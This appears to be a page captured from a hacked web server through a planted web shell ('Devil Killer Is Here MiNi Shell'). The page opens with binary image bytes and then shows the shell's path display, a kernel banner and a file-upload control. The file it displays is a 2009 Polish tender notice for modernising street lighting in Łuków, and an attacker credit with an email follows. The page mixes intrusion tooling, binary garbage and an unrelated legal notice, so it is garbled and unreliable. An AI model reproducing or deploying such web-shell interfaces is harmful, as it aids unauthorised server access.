JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20091019/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20091019/181613-N-2009.html

<p class="kh_header"><b>Łuków: WYKONANIE MODERNIZACJI OŚWIETLENIA DROGOWEGO W MIEŚCIE ŁUKÓW</b><br>
<b>Numer ogłoszenia: 181613 - 2009; data zamieszczenia: 19.10.2009</b><br>
OGŁOSZENIE O ZAMÓWIENIU - roboty budowlane<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Miasto Łuków , ul. Piłsudskiego 17, 21-400 Łuków, woj. lubelskie.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.lukow.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> WYKONANIE MODERNIZACJI OŚWIETLENIA DROGOWEGO W MIEŚCIE ŁUKÓW.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> roboty budowlane.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Wykonanie modernizacji oświetlenia drogowego w Mieście Łuków wraz z zaprojektowaniem i uzupełnieniem o nowe punkty świetlne zgodnie z programem funkcjonalno użytkowym.
Zamówienie obejmuje:
-  wykonanie modernizacji w  ilości 2454 sztuk opraw;
- zaprojektowanie i montaż systemu oświetleniowego na istniejących słupach energetycznych w ilości 21 sztuk opraw wraz z dowieszeniem przewodu..</p>
<p><b>II.1.4) Wspólny Słownik Zamówień (CPV):</b> 45.31.61.10-9.</p>
<p><b>II.1.5) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.1.7) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p><p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w miesiącach: 06.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WARUNKI DOTYCZĄCE ZAMÓWIENIA</b>
</p><b>Informacja na temat wadium:</b> 1.	Oferta musi być zabezpieczona wadium w wysokości 70 000,00 PLN (słownie: siedemdziesiąt tysięcy złotych).
2.	Wadium musi być wniesione przez wykonawców zaproszonych do składania ofert przed upływem terminu do ich składania.
3.	Wadium może być wniesione w: 
1)	pieniądzu,
2)	poręczeniach bankowych lub poręczeniach spółdzielczej kasy oszczędnościowo - kredytowej, z tym że poręczenie kasy jest zawsze poręczeniem pieniężnym,
3)	gwarancjach bankowych,
4)	gwarancjach ubezpieczeniowych, 
5)	poręczeniach udzielanych przez podmioty, o których mowa w art. 6 b ust 5 pkt. 2 ustawy z dnia 9 listopada 2000r. o utworzeniu Polskiej Agencji Rozwoju Przedsiębiorczości (Dz. U. Z 2007r. Nr 42, poz. 275).
4.	Wadium wnoszone w pieniądzu wpłaca się przelewem na rachunek bankowy: BANK PEKAO S.A. Nr 51 1240 2698 1111 0010 2632 9540;  z dopiskiem: modernizacja oświetlenia.
5.	W terminie składania ofert na rachunku Zamawiającego muszą znaleźć się pieniądze przelane tytułem wadium. Do oferty należy dołączyć kserokopię polecenia przelewu. 
6.	W przypadku składania przez Wykonawcę wadium w formie gwarancji, gwarancja powinna być sporządzona zgodnie z obowiązującym prawem i powinna zawierać następujące elementy:
1)	nazwę dającego zlecenie (Wykonawcy), beneficjenta gwarancji (Zamawiającego), gwaranta (banku lub instytucji ubezpieczeniowej udzielającej gwarancji) oraz wskazania ich siedzib i daty zawarcia umowy;
2)	określenie wierzytelności, która ma być zabezpieczona gwarancją;
3)	kwotę gwarancji;
4)	termin ważności gwarancji;
5)	nieodwołalne i bezwarunkowe zobowiązania gwaranta do zapłacenia kwoty gwarancji na pierwsze pisemne żądanie Zamawiającego w przypadku gdy Wykonawca, którego ofertę wybrano:
- odmówił podpisania umowy na warunkach określonych w ofercie;
- nie wniósł zabezpieczenia należytego wykonania umowy;
- zawarcie umowy stało się niemożliwe z przyczyn leżących po stronie Wykonawcy;
- w odpowiedzi na wezwanie o którym mowa w art. 26 ust. 3 P.z.p. nie złożył dokumentów lub oświadczeń o których mowa w art. 25 ust. 1 P.z.p. lub pełnomocnictw, chyba, że udowodni, że wynika  to z przyczyn nieleżących po jego stronie.
7.	postanowienia ust. 6 stosuje się również do poręczeń, określonych w ust. 3 pkt 2 i 5.
8.	W przypadku wniesienia wadium w formie innej niż w pieniądzu należy złożyć oryginał dokumentu potwierdzającego wniesienie wadium w ofercie. Wykonawca załącza do oferty oryginał dokumentu potwierdzającego wniesienie wadium w sposób uniemożliwiający jego zaginięcie, pozwalający jednak na jego zwrot bez dekompletowania oferty - oryginał nie może być na trwale zespolony z ofertą. W przypadku niezastosowania się do powyższego zwrot oryginału będzie niemożliwy.
9.	Wadium wnoszone w formie niepieniężnej powinno zachować ważność od dnia składania ofert do upływu terminu związania ofertą.
10.	Wykonawca, którego oferta nie będzie zabezpieczona wymienioną wyżej formą wadium zostanie przez Zamawiającego wykluczony z postępowania o udzielenie zamówienia publicznego.
11.	Zamawiający dokona zwrotu wadium zgodnie z warunkami określonymi w art. 46 ustawy Prawo Zamówień  Publicznych.
12.	Zamawiający zatrzymuje wadium wraz z odsetkami w sytuacjach określonych w art. 46 ust. 4a i ust.5 ustawy Prawo Zamówień Publicznych.<br><p><b>III.2) WARUNKI UDZIAŁU</b></p>
<ul class="kh_indent_1"><li><b>Opis warunków udziału w postępowaniu oraz opis sposobu dokonywania oceny spełniania tych warunków:</b> Oddział 1. Opis warunków udziału w postępowaniu 
O udzielenie zamówienia mogą ubiegać się wykonawcy, którzy: 
1)	posiadają uprawnienia do wykonywania określonej działalności lub czynności, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień;
- zamawiający wymaga aby wykonawcy prowadzili zarejestrowaną działalność gospodarczą.
2)	posiadają niezbędną wiedzę i doświadczenie oraz dysponują potencjałem technicznym i osobami zdolnymi do wykonania zamówienia; 
a)	wykonali w ciągu ostatnich 5 lat przed dniem wszczęcia postępowania o udzielenie zamówienia a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, co najmniej dwie roboty budowlane odpowiadające swoim rodzajem i wartością robotom budowlanym stanowiącym przedmiot zamówienia polegającą na wykonaniu modernizacji, remoncie lub budowie sieci elektroenergetycznych lub oświetleniowych połączonych z instalacją opraw o wartości niemniejszej niż 2 500 000 PLN brutto każda, z podaniem ich wartości, ilości zainstalowanych opraw oraz daty i miejsca wykonania. Do wykazu Wykonawca musi również dołączyć dokumenty potwierdzające, że roboty te zostały wykonane należycie (np. referencje, protokoły odbioru, itp.),
b)	wykażą niezbędne do wykonania zamówienia narzędzia i urządzenia , którymi dysponuje lub będzie dysponował wykonawca:
- samochodowy podnośnik montażowy minimum - 2 szt;
- żuraw minimum - 1 szt;
- samochód ciężarowy minimum - 1 szt.
lub przedstawią pisemne zobowiązanie innych podmiotów do udostępnienia niezbędnych do wykonania zamówienia narzędzi i urządzeń, jeżeli w wykazie, o którym mowa, wykonawca wskazał narzędzia i urządzenia, którymi będzie dysponował.
c)	wykażą  osoby, którymi dysponują lub będą dysponować i które będą uczestniczyć  w wykonywaniu zamówienia posiadające następujące wykształcenie, doświadczenie i kwalifi?kacje zawodowe, a także zakres wykonywanych przez nie czynności:
-	projektowania- co najmniej 1 osoba wykształcenie minimum średnie, uprawnienia do projektowania bez ograniczeń w specjalności instalacyjnej w zakresie sieci instalacji i urządzeń elektrycznych i elektroenergetycznych, doświadczenie 3 lata, 
-	kierowania robotami w specjalności instalacyjnej w zakresie sieci instalacji i urządzeń elektrycznych i elektroenergetycznych -  co najmniej 1 osoba, wykształcenie minimum średnie, kwalifikacje kategorii D, doświadczenie 3 lata
-	elektromonter - co najmniej 10 osób wykształcenie zasadnicze zawodowe, kwalifikacje kategorii E, doświadczenie 2 lata.
lub przedstawią pisemne zobowiązanie innych podmiotów do udostępnienia osób zdolnych do wykonania zamówienia, jeżeli w wykazie o którym mowa wykonawca wskazał osoby, którymi będzie dysponował
d)	osoby, które będą uczestniczyć w wykonaniu zamówie?nia posiadają odpowiednio następujące uprawnienia
- Projektant - uprawnienia do projektowania bez ograniczeń w specjalności instalacyjnej w zakresie sieci instalacji i urządzeń elektrycznych i elektroenergetycznych;
- Kierownik robót  - uprawnienia do wykonywania samodzielnych funkcji technicznych w budownictwie w rozumieniu ustawy z dnia 7 lutego 1994 r. Prawo budowlane w specjalności instalacyjnej w zakresie sieci instalacji i urządzeń elektrycznych i elektroenergetycznych , kwalifikacje kategorii D, 
- Elektromonter - kwalifikacje kategorii E, 
3)	znajdują się w sytuacji ekonomicznej i finansowej za?pewniającej wykonanie zamówienia;
- posiadają ubezpieczenie od odpowiedzialności cywilnej w zakresie prowadzonej działalności gospodarczej na kwotę nie mniejszą niż 1 000 000,00 zł;
- posiadają środki finansowe lub zdolność kredytową na kwotę nie mniejszą niż 1 500 000,00 zł.
4)	nie podlegają wykluczeniu z postępowania o udzielenie zamówienia.
- nie jest wykonawcą, który wyrządził szkodę, nie wykonując zamówienia lub wykonując je nienależycie, jeżeli szkoda ta została stwierdzona prawomocnym orzeczeniem sądu wydanym w okresie 3 lat przed wszczęciem postępowania;
- nie jest wykonawcą, w stosunku do którego otwarto likwidację lub których upadłość ogłoszono, z wyjątkiem wykonawców, którzy po ogłoszeniu upadłości zawarli układ zatwierdzony prawomocnym postanowieniem sądu, jeżeli układ nie przewiduje zaspokojenia wierzycieli poprzez likwidacje majątku upadłego.
- nie zalegają z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne lub zdrowotne, z wyjątkiem przypadków, kiedy uzyskał przewidziane prawem zwolnienie, odroczenie, rozłożenie na raty zaległości płatności lub wstrzymanie w całości wykonania decyzji organu podatkowego;
- nie podlegają wykluczeniu z postępowania na podstawie art. 24, ust. 1, pkt. 4-8 P.z.p.
- nie podlegają wykluczeniu z postępowania na podstawie art. 24, ust. 1, pkt. 9 P.z.p.
5)	Z grona wykonawców spełniających warunki udziału w postępowaniu zamawiający zaprosi do złożenia ofert 5 wykonawców.
a)	Jeżeli liczba wykonawców spełniających warunki progowe będzie mniejsza od pięciu Zamawiający zaprosi do złożenia ofert wszystkich wykonawców;
b)	Jeżeli liczba wykonawców spełniających warunki progowe będzie większa od pięciu decydować będzie łączna ilość punktów uzyskanych za:
- ilości wykonanych robót budowlanych ponad warunek progowy tj. ponad 2 roboty;
- największa liczba zainstalowanych opraw spośród złożonych ofert;
- największa wartość robót ponad warunek progowy spośród złożonych ofert tj. 5 000 000 PLN
zgodnie z opisem oceny podanym w oddziale 2.
Oddział 2. Opis sposobu dokonywania oceny spełniania tych warunków 
1.	Ocena spełnienia opisanych warunków udziału w postępowaniu dokonywana będzie w oparciu o dokumenty określone oddziale 3 Informacja o oświadczeniach i dokumentach, jakie mają dostarczyć wykonawcy w celu potwierdzenia spełniania warunków udziału w postępowaniu  metodą warunku granicznego - spełnia/niespełna.
2.	Ocena kwalifikacji minimum 5 wykonawców w oparciu o posiadaną wiedzę i doświadczenie dokonywana będzie następująco:
Wzór 1	
liczba punktów =   (liczba robót w ofercie ocenianej)/ (Najwyższa liczba robót spośród złożonych ofert)  X 100 pkt.   
                                                 
Wzór 2
                                          
 liczba punktów = (liczba zainstalowanych opraw w ofercie ocenianej) /(Najwyższa liczba zainstalowanych opraw spośród złożonych ofert) X 100 pkt.
                                    

Wzór 3 
                                                                 
 liczba punktów = (wartość robót w ofercie ocenianej) /(Najwyższa wartość robót spośród złożonych ofert)  X 100 pkt.

Kwalifikacja do zaproszenia do złożenia oferty dokonywana będzie na zasadzie sumy uzyskanych punktów. Wykonawca spełniający w najwyższym stopniu wymagania kryterium otrzyma maksymalną ilość punktów za to kryterium. Pozostałym wykonawcom przypisana zostanie odpowiednio mniejsza ilość punktów. Obliczenia dokonywane będą z dokładnością do dwóch miejsc po przecinku.
3.	Zamawiający uzna, że wykonawca spełnia warunki udziału w postępowaniu, jeżeli wykonawca złoży wraz z ofertą wszystkie dokumenty wskazane w oddziale 3 wykazujące spełnienie warunków udziału w postępowaniu. Brak załączenia przez wykonawcę któregokolwiek z dokumentów zostanie uznane przez zamawiającego jako niespełnienie warunku, co będzie skutkować wykluczeniem wykonawcy z postępowania, z zastrzeżeniem art. 26 ust. 3 Pzp. 
4.	Zamawiający wezwie wykonawców, którzy w określonym terminie nie złożyli wymaganych przez zamawiającego oświadczeń lub dokumentów lub którzy nie złożyli pełnomocnictw albo którzy złożyli wymagane przez zamawiającego oświadczenia lub dokumenty lub którzy złożyli wadliwe pełnomocnictwa, do ich złożenia             w wyznaczonym terminie. 
5.	Zamawiający zaniecha wzywania wykonawcy do uzupełnień, o których mowa w ust. 3, jeżeli mimo ich złożenia oferta wykonawcy będzie podlegać odrzuceniu albo konieczne będzie unieważnienie postępowania. 
6.	Oświadczenia i dokumenty składane na wezwanie zamawiającego muszą potwierdzać spełnianie przez wykonawcę warunków udziału w postępowaniu oraz spełnianie przez oferowane dostawy, usługi lub roboty budowlane wymagań określonych przez zamawiającego, nie później niż w dniu, w którym upłynął termin składania ofert (art. 26 ust. 3 Pzp). 
7.	Wykonawcy mogą wspólnie ubiegać się o udzielenie zamówienia. Wykonawcy wspólnie ubiegający się o udzielenie zamówienia ustanawiają pełnomocnika do reprezentowania ich w postępowaniu o udzielenie zamówienia lub reprezentowania w postępowaniu i zawarcia umowy w sprawie zamówienia publicznego. Jeżeli oferta wykonawców, wspólnie ubiegających się o udzielenia zamówienia, zostanie wybrana, zamawiający może zażądać przed zawarciem umowy w sprawie zamówienia publicznego, umowy regulującej współpracę tych wykonawców, zgodnie z art. 23 Pzp. 
8.	Ofertę wykonawcy wykluczonego uznaje się za odrzuconą, zgodnie z art. 24 ust. 4 Pzp..</li>
<li><b>Informacja o oświadczeniach i dokumentach, jakie mają dostarczyć wykonawcy w celu potwierdzenia spełniania warunków udziału w postępowaniu:</b> Oddział 3. Informacja o oświadczeniach i dokumentach, jakie mają dostarczyć wykonawcy w celu potwierdzenia spełniania warunków udziału w postępowaniu (jeżeli dotyczy) 
1.	W celu potwierdzenia, że wykonawca posiada uprawnienie do wykonywania określonej działalności lub czynności oraz nie podlega wykluczeniu na podstawie art. 24 Pzp, Zamawiający żąda: 
1)	aktualnego odpisu z właściwego rejestru albo ak?tualnego zaświadczenia o wpisie do ewidencji działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub zgłoszenia do ewidencji działalności gospodarczej, dokument wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert (w przypadku wspólnego ubiegania się o udzielenie niniejszego zamówienia przez dwóch lub więcej Wykonawców w ofercie muszą być złożone przedmiotowe dokumenty oddzielnie dla każdego z nich).
2.	W celu potwierdzenia opisanego przez zama?wiającego warunku posiadania przez wykonawcę niezbędnej wiedzy   i doświadczenia oraz dysponowania potencjałem technicznym i osobami zdolnymi do wykonania zamówienia, zamawiający żąda: 
1)	wykazu wykonanych dwóch robót budowlanych w okresie ostatnich 5 lat przed dniem wszczęcia postępowania o udzielenie zamówienia a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, odpowiadających swoim rodzajem i wartością robotom budowlanym stanowiącym przedmiot zamówienia polegającą na wykonaniu modernizacji, remoncie lub budowie sieci elektroenergetycznych lub oświetleniowych połączonych z instalacją opraw o wartości niemniejszej niż 2 500 000 PLN brutto każda, z podaniem ich wartości, ilości zainstalowanych opraw oraz daty i miejsca wykonania. Do wykazu Wykonawca musi również dołączyć dokumenty potwierdzające, że roboty te zostały wykonane należycie (np. referencje, protokoły odbioru, itp.), ( w przypadku wspólnego ubiegania się o udzielenie niniejszego zamówienia przez dwóch lub więcej Wykonawców wszyscy Wykonawcy mogą wspólnie załączyć do oferty przedmiotowe dokumenty).
2)	wykazu niezbędnych do wykonania zamówienia narzędzi i urządzeń , którymi dysponuje lub będzie dysponował wykonawca;
2a)  pisemnego zobowiązanie innych podmiotów do udostępnienia niezbędnych do wykonania zamówienia narzędzi i urządzeń, jeżeli w wykazie, o którym mowa, w pkt. 2 wykonawca wskazał narzędzia i urządzenia, którymi będzie dysponował.
(w przypadku wspólnego ubiegania się o udzielenie niniejszego zamówienia przez dwóch lub więcej Wykonawców wszyscy Wykonawcy mogą wspólnie załączyć do oferty przedmiotowe dokumenty).
3)	wykazu osób, którymi dysponuje lub będzie dysponował wykonawca i które będą uczestniczyć                      w wykonywaniu zamówienia, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia          i wykształcenia niezbędnych do wykonania zamówienia, a także zakresu wykonywanych przez nie czynności. 
3a)	pisemnego zobowiązania innych niż wykonawca podmiotów do tego, aby wykonawca mógł dysponować wykazanymi osobami, jeżeli w wykazie, o którym mowa w pkt 3 wykonawca wskazał osoby, którymi będzie dysponował; 
(w przypadku wspólnego ubiegania się o udzielenie niniejszego zamówienia przez dwóch lub więcej Wykonawców wszyscy Wykonawcy mogą wspólnie załączyć do oferty przedmiotowe dokumenty).
4)	dokumentów stwierdzających, że osoby, którymi dysponuje wykonawca, posiadają wymagane uprawnienia,
a)	Projektant 
- uprawnienia do projektowania bez ograniczeń w specjalności instalacyjnej w zakresie sieci instalacji i urządzeń elektrycznych i elektroenergetycznych;
- aktualne zaświadczenie o członkostwie we właściwej Okręgowej Izbie Inżynierów Budownictwa
b)	Kierownik robót
- uprawnienia do wykonywania samodzielnych funkcji technicznych w budownictwie  w rozumieniu ustawy z dnia 7 lutego 1994 r. Prawo budowlane w specjalności instalacyjnej w zakresie sieci instalacji i urządzeń elektrycznych i elektroenergetycznych,
- aktualne zaświadczenie stwierdzające przynależność do właściwej izby samorządu zawodowego;
- świadectwo kwalifikacyjne D;
c)	Elektromonter
- świadectwo kwalifikacyjne E
 (w przypadku wspólnego ubiegania się o udzielenie niniejszego zamówienia przez dwóch lub więcej Wykonawców wszyscy Wykonawcy mogą wspólnie załączyć do oferty przedmiotowe dokumenty).
3.	W celu potwierdzenia opisanego przez zamawiającego warunku znajdowania się w sytuacji ekonomicznej i finansowej za?pewniającej wykonanie zamówienia zamawiający żąda:
1)	polisy a w przypadku jej braku innego dokumentu potwierdzającego, że wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności na kwotę nie mniejszą niż 1 000 000,00zł;
2)	informacji banku lub spółdzielczej kasy oszczędnościowo- kredytowej, w których wykonawca posiada rachunek, potwierdzającej wysokość posiadanych środków finansowych lub zdolność kredytową wykonawcy, wystawionej nie wcześniej niż 3 miesiące przed upływem terminu do składania ofert na kwotę nie mniejszą niż 1.500.000,00 zł;
(w przypadku wspólnego ubiegania się o udzielenie niniejszego zamówienia przez dwóch lub więcej Wykonawców wszyscy Wykonawcy mogą wspólnie załączyć do oferty przedmiotowe dokumenty).
4.	W celu potwierdzenia opisanego przez zama?wiającego warunku nie podlegania wykluczeniu z postępowania         o udzielenie zamówienia zamawiający żąda: 
1)	aktualnych zaświadczeń właściwego naczelnika urzędu skarbowego oraz właściwego oddziału Za?kładu Ubezpieczeń Społecznych lub Kasy Rolni?czego Ubezpieczenia Społecznego potwierdzają?cych odpowiednio, że wykonawca nie zalega z opłacaniem podatków, opłat oraz składek na ubezpieczenie zdrowotne i społeczne, lub zaświadczeń, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - dokumenty wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania ofert, (w przypadku wspólnego ubiegania się o udzielenie niniejszego zamówienia przez dwóch lub więcej Wykonawców w ofercie muszą być złożone przedmiotowe dokumenty dla każdego z nich).
2)	aktualnej informacji z Krajowego Rejestru Karnego w zakresie określonym w art. 24 ust. 1 pkt 4-8 Pzp, wystawionej nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert, (w przypadku wspólnego ubiegania się o udzielenie niniejszego zamówienia przez dwóch lub więcej Wykonawców w ofercie muszą być złożone przedmiotowe dokumenty dla każdego z nich).
3)	aktualnej informacji z Krajowego Rejestru Karnego w zakresie określonym w art. 24 ust. 1 pkt 9 Pzp, wystawionej nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert (w przypadku wspólnego ubiegania się o udzielenie niniejszego zamówienia przez dwóch lub więcej Wykonawców w ofercie muszą być złożone przedmiotowe dokumenty dla każdego z nich).
4)	oświadczenia, zgodnego z art. 22 ust. 1 Pzp, o spełnianiu warunków udziału w postępowaniu
(w przypadku wspólnego ubiegania się o udzielenie niniejszego zamówienia przez dwóch lub więcej Wykonawców w ofercie muszą być złożone przedmiotowe dokumenty dla każdego z nich).
5.	Wykonawca mający siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej stosuje się do    § 2 rozporządzenia Prezesa Rady Ministrów z dnia 19 maja 2006 r. w sprawie rodzajów dokumentów, jakich może żądać zamawiający od wykonawcy oraz form, w jakich te dokumenty mogą być składane. 
6.	Wykonawca ma obowiązek składać dokumenty w formie oryginału lub kopii poświadczonej za zgodność               z oryginałem przez wykonawcę.
7.	Zamawiający może żądać przedstawienia oryginału lub notarialnie poświadczonej kopii dokumentu wyłącznie wtedy, gdy złożona przez wykonawcę kopia dokumentu jest nieczytelna lub budzi wątpliwości co do jej prawdziwości. 
Dokumenty sporządzone w języku obcym są składane wraz z tłumaczeniem na język polski, poświadczonym przez wykonawcę. Tłumaczenie nie jest wymagane, jeżeli zamawiający wyraził zgodę, o której mowa w art. 9 ust. 3 ustawy..</li></ul>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>

<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg ograniczony.</p>
<p><b>IV.1.2) Przewidywana liczba wykonawców, którzy zostaną zaproszeni do udziału w postępowaniu:</b> 5.</p><br><p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p><p><b>IV.2.2) Wykorzystana będzie aukcja elektroniczna:</b> nie.</p><br><p><b>IV.3) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.3.1)</b>&nbsp;<b>Adres strony internetowej, na której dostępna jest specyfikacja istotnych warunków zamówienia:</b> nie dotyczy.<br><b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> SIWZ zostanie przekazana Wykonawcom, którzy zostaną zakwalifikowani  na podstawie złożonych wniosków o dopuszczenie do udziału w postępowaniu wraz z zaproszeniem do składania ofert..</p>
<p><b>IV.3.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 30.10.2009 godzina 11:00, miejsce: URZĄD MIASTA ŁUKÓW UL. PIŁSUDSKIEGO 17, 21-400 ŁUKÓW POK. 109 SEKRETARIAT.</p><p><b>IV.3.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com